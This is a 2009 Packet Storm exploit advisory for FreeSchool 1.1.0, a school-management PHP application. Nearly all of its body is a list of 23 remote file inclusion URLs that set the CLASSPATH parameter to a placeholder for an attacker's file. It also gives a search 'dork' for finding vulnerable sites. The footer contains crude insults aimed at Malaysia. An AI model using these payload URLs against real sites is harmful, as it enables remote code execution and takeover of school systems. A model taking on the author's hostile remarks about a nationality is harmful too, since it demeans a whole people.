FreeSchool 1.1.0 Remote File Inclusion

2009-09-03T00:00:00
ID PACKETSTORM:80956
Type packetstorm
Reporter cr4wl3r
Modified 2009-09-03T00:00:00

Description

                                        
                                            `######################################################################  
#[x] FreeSchool <= 1.1.0 Mutiple Remote File Include Vulnerability   
#[!] Download Script : http://sourceforge.net/projects/freeschool/files/   
#[!] Author : cr4wl3r   
#[!] Contact : cr4wl3r[4t]linuxmail[dot]org   
#[!] Location : Gorontalo - INDONESIA   
#[!] Dork : "FuCk y0u MaLaYsia"   
######################################################################  
  
[x] 3xplo!t :   
  
http://localhost/[path]/biblioteca/bib_form.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/bib_pldetails.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/bib_plform.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/bib_plsearchc.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/bib_plsearchs.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/bib_save.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/bib_searchc.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/bib_searchs.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/edi_form.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/edi_save.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/gen_form.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/gen_save.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/lin_form.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/lin_save.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/luo_form.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/luo_save.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/sog_form.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/biblioteca/sog_save.php?CLASSPATH=[AvriLhea]  
http://localhost/[path]/calendario/cal_insert.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/calendario/cal_save.php?CLASSPATH=[AvriLhea]  
http://localhost/[path]/calendario/cal_saveactivity.php?CLASSPATH=[AvriLhea]  
http://localhost/[path]/circolari/cir_save.php?CLASSPATH=[AvriLhea]   
http://localhost/[path]/modulistica/mdl_save.php?CLASSPATH=[AvriLhea]  
  
######################################################################  
#[!] Greetz : MyMom [alm]   
#   
#[!] Special Thanks : str0ke, google, sourceforge, All MusLiM HacKers   
#  
#[!] Thanks 2 : xoron, opt!x hacker, irvian, cyberlog  
#  
#[!] AlfaNet Cr3w GoRonTaLo : FaHry PunKs, RhyA HaMim, BoBy C00l, UyaN, ArYa.TaMa  
#  
#[!] My BiG BozZ MinJo.B0rj0e (YanG PunYa SepaRuH KaMpuNg Bugis, JaNgan LuPa Am-Am) :D  
#  
#[!] FuCk MaLaYsia, I HaTe MaLaYsia, h0w Ab0uT y0u???   
#  
#[!] sekuritionline.net | manadocoding.net   
######################################################################  
  
`